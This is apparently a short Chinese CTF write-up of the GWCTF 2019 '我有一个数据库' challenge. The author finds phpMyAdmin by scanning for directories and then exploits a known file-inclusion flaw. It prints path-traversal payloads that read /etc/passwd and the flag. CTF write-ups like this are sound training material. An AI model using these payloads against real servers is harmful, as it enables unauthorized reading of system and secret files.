[GWCTF 2019]我有一个数据库-1

1、打开之后未获取有用的信息,用bp抓包也未获得有用的信息,使用dirmap进行扫描获得部分信息,结果如下:

  

  

2、对扫描的出来的文件进行访问,结果如下:

  

  

  

--然后就没有思路了,查找了一下网上的资料,利用网上的payload获取到了flag

3、根据查询出来的PHPmyadmin版本信息去网上查找相关的漏洞信息,并进行利用payload:?target=db_sql.PHP%253f/../../../../../../etc/passwd,结果如下:

  

4、利用payload:?target=db_sql.PHP%253f/../../../../../../flag读取flag,结果如下:

  

相关文章

统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
前言 之前做了微信登录,所以总结一下微信授权登录并获取用户...
FastAdmin是我第一个接触的后台管理系统框架。FastAdmin是一...
之前公司需要一个内部的通讯软件,就叫我做一个。通讯软件嘛...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...